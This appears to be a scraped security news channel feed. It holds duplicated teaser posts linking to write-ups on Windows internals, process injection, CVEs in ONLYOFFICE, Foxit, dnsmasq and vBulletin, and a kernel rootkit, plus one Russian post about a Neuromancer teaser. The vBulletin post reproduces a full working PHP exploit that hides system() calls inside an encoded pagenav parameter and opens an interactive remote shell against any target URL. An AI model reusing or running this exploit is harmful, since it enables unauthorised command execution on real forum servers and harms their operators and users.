GDID: The Windows Global Device Identifier
Original text: “GDID: The Windows Global Device Identifier” — Smukx, ZeroTrace Lab (July 18, 2026). Code blocks, commands, tables, and technical specifications reproduced verbatim with attribution.
Executive Summary
Every Windows installation receives a unique 64-bit Global Device Identifier (GDID) that serves as Microsoft’s canonical device-level tracking mechanism. The GDID originates as a plaintext registry value…
https://core-jmp.org/2026/07/gdid-windows-global-device-identifier/
Original text: “GDID: The Windows Global Device Identifier” — Smukx, ZeroTrace Lab (July 18, 2026). Code blocks, commands, tables, and technical specifications reproduced verbatim with attribution.
Executive Summary
Every Windows installation receives a unique 64-bit Global Device Identifier (GDID) that serves as Microsoft’s canonical device-level tracking mechanism. The GDID originates as a plaintext registry value…
https://core-jmp.org/2026/07/gdid-windows-global-device-identifier/
🔥2
Breaking ONLYOFFICE in 3 steps: OnlyShells vulnerability chain
Original text: “Breaking ONLYOFFICE in 3 steps: OnlyShells vulnerability chain” — BI.ZONE Vulnerability Research team, BI.ZONE (July 21, 2026). Code, CVE metadata, figures and the demonstration video below are reproduced with attribution captions.
Executive Summary
OnlyShells is a chain of five vulnerabilities discovered in ONLYOFFICE Desktop Editors during a fall 2025 security assessment. Chained together,…
https://core-jmp.org/2026/07/onlyoffice-onlyshells-vulnerability-chain/
Original text: “Breaking ONLYOFFICE in 3 steps: OnlyShells vulnerability chain” — BI.ZONE Vulnerability Research team, BI.ZONE (July 21, 2026). Code, CVE metadata, figures and the demonstration video below are reproduced with attribution captions.
Executive Summary
OnlyShells is a chain of five vulnerabilities discovered in ONLYOFFICE Desktop Editors during a fall 2025 security assessment. Chained together,…
https://core-jmp.org/2026/07/onlyoffice-onlyshells-vulnerability-chain/
🔥4😱3👍2
KernelCallbackTable Process Injection
Original text: “KernelCallbackTable Process Injection” — S12, Medium (2026). Code blocks and technical implementation details are reproduced verbatim with attribution.
Executive Summary
Windows message handling is everywhere. Every GUI application sits in a message loop waiting for user input and window events. But what happens when an attacker corrupts the callback table that decides which…
https://core-jmp.org/2026/07/kernelcallbacktable-process-injection/
Original text: “KernelCallbackTable Process Injection” — S12, Medium (2026). Code blocks and technical implementation details are reproduced verbatim with attribution.
Executive Summary
Windows message handling is everywhere. Every GUI application sits in a message loop waiting for user input and window events. But what happens when an attacker corrupts the callback table that decides which…
https://core-jmp.org/2026/07/kernelcallbacktable-process-injection/
🔥2
Escalating All The Privileges With Foxit PDF Reader (CVE-2026-57239)
Original text: “Escalating All The Privileges With Foxit PDF Reader (CVE-2026–57239)” — Luke Paris, Paradoxis (July 15, 2026). Code snippets, technical analysis, and detection/mitigation guidance are reproduced verbatim with attribution.
Executive Summary
CVE-2026-57239 is a local privilege escalation vulnerability discovered in Foxit PDF Reader that allows an unprivileged user to escalate privileges to NT AUTHORITYSYSTEM…
https://core-jmp.org/2026/07/escalating-privileges-foxit-pdf-reader-cve-2026-57239/
Original text: “Escalating All The Privileges With Foxit PDF Reader (CVE-2026–57239)” — Luke Paris, Paradoxis (July 15, 2026). Code snippets, technical analysis, and detection/mitigation guidance are reproduced verbatim with attribution.
Executive Summary
CVE-2026-57239 is a local privilege escalation vulnerability discovered in Foxit PDF Reader that allows an unprivileged user to escalate privileges to NT AUTHORITYSYSTEM…
https://core-jmp.org/2026/07/escalating-privileges-foxit-pdf-reader-cve-2026-57239/
🔥2😱1
Dnsmasq DNS Remote Heap Buffer Overflow (CVE-2026-2291)
Original text: “Dnsmasq DNS Remote Heap Buffer Overflow” — David Barksdale, Exodus Intelligence (July 20, 2026). Code snippets, DNS responses, and exploitation details are reproduced verbatim with attribution.
Executive Summary
CVE-2026-2291 is a critical remote code execution vulnerability in dnsmasq, a widely deployed lightweight DNS and DHCP server used in embedded systems, routers, and Linux…
https://core-jmp.org/2026/07/dnsmasq-dns-remote-heap-buffer-overflow-cve-2026-2291/
Original text: “Dnsmasq DNS Remote Heap Buffer Overflow” — David Barksdale, Exodus Intelligence (July 20, 2026). Code snippets, DNS responses, and exploitation details are reproduced verbatim with attribution.
Executive Summary
CVE-2026-2291 is a critical remote code execution vulnerability in dnsmasq, a widely deployed lightweight DNS and DHCP server used in embedded systems, routers, and Linux…
https://core-jmp.org/2026/07/dnsmasq-dns-remote-heap-buffer-overflow-cve-2026-2291/
🔥7😱3👍1
NEUROMANCER
*
timeline:
Книгу Гибсон написал в 80х
Экранизировать пытались с 90х
Прочитал я ее где то в 2007.
Толпы фанатов, тонны ФанФиков, миллионы всякого арта и тд и пт, в итоге - невероятнейший долгострой.
В принципе можно было бы уже ИИ самим подключить, да и закрыть гештальт.
И тем не менее яблоко вываливает:
NEUROMANCER First Teaser
#cyberpunk
*
timeline:
Книгу Гибсон написал в 80х
Экранизировать пытались с 90х
Прочитал я ее где то в 2007.
Толпы фанатов, тонны ФанФиков, миллионы всякого арта и тд и пт, в итоге - невероятнейший долгострой.
В принципе можно было бы уже ИИ самим подключить, да и закрыть гештальт.
И тем не менее яблоко вываливает:
NEUROMANCER First Teaser
#cyberpunk
🔥17👍4😱1
Exploiting HTTP Parser Inconsistencies: ACL Bypasses, SSRF, and Cache Poisoning
Original text: “Exploiting HTTP Parsers Inconsistencies” — Rafa, Rafa’s Security Researches (research conducted December 2021 – April 2022). Code blocks, tables and figures below are reproduced verbatim with attribution captions.
Executive Summary
HTTP is the connective tissue of the modern web, but the specification leaves enough ambiguity that no two parsers agree on every edge…
https://core-jmp.org/2026/07/exploiting-http-parser-inconsistencies/
Original text: “Exploiting HTTP Parsers Inconsistencies” — Rafa, Rafa’s Security Researches (research conducted December 2021 – April 2022). Code blocks, tables and figures below are reproduced verbatim with attribution captions.
Executive Summary
HTTP is the connective tissue of the modern web, but the specification leaves enough ambiguity that no two parsers agree on every edge…
https://core-jmp.org/2026/07/exploiting-http-parser-inconsistencies/
👍7🔥2
CVE-2026-61511 vBulletin
*
Affected Versions
vBulletin 6.2.1 and prior
vBulletin 6.1.6 and prior
*
Exploit
*
Affected Versions
vBulletin 6.2.1 and prior
vBulletin 6.1.6 and prior
*
Exploit
<?php
set_time_limit(0);
error_reporting(E_ERROR);
print "+-------------------------------------+\n";
print "| vBulletin 0-day RCE exploit by EgiX |\n";
print "+-------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[+] cURL extension required!\n");
if ($argc != 2) {
print "\nUsage......: php $argv[0] <URL>\n";
print "\nExample....: php $argv[0] http://localhost/vb/";
print "\nExample....: php $argv[0] https://vbulletin.com/\n\n";
die();
}
function encodeChar($char)
{
$numbers = ['0' => '(O)', '1' => '(1)', '2' => '(2)', '3' => '(3)', '4' => '(4)', '5' => '(5)', '6' => '(6)', '7' => '(7)', '8' => '(8)', '9' => '(9)'];
$char = strval(ord($char));
$ret = '';
for ($i = 0; $i < strlen($char); $i++) $ret .= $numbers[$char[$i]] . '.';
return rtrim($ret, '.');
}
function makePayload($function, $param)
{
$chr_fun = '((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))';
$ret = '';
foreach (str_split($function) as $c) $ret .= $chr_fun . '(' . encodeChar($c) . ').';
$ret = "(" . rtrim($ret, '.') . ')((';
foreach (str_split($param) as $c) $ret .= $chr_fun . '(' . encodeChar($c) . ').';
return rtrim($ret, '.') . '))';
}
$curl = curl_init();
$params = ["routestring" => "ajax/render/pagenav"];
curl_setopt($curl, CURLOPT_URL, $argv[1]);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
//curl_setopt($curl, CURLOPT_PROXY, "http://127.0.0.1:8080");
while (1) {
print "\nvb-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$cmd .= "; echo _____";
$params["pagenav[pagenumber]"] = makePayload("system", $cmd);
curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($params));
preg_match('/_____(.*)_____/s', curl_exec($curl), $m) ? print $m[1] : die("\n[+] Exploit failed! :(\n\n");
}
👍11🔥8
SakDriver: Reversing a Windows Kernel Driver Rootkit
Original text: “SakDriver: Reversing a Kernel Driver Rootkit” — 0xSec, 0xsec.gitbook.io. Disassembly screenshots, the command-ID table, indicators of compromise and the YARA figure below are reproduced with attribution captions.
Executive Summary
What began as a routine look at a “Cobalt Strike Beacon” sample turned out to be something far more dangerous: a full Windows kernel-mode…
https://core-jmp.org/2026/07/sakdriver-reversing-kernel-driver-rootkit/
Original text: “SakDriver: Reversing a Kernel Driver Rootkit” — 0xSec, 0xsec.gitbook.io. Disassembly screenshots, the command-ID table, indicators of compromise and the YARA figure below are reproduced with attribution captions.
Executive Summary
What began as a routine look at a “Cobalt Strike Beacon” sample turned out to be something far more dangerous: a full Windows kernel-mode…
https://core-jmp.org/2026/07/sakdriver-reversing-kernel-driver-rootkit/
👍3🔥1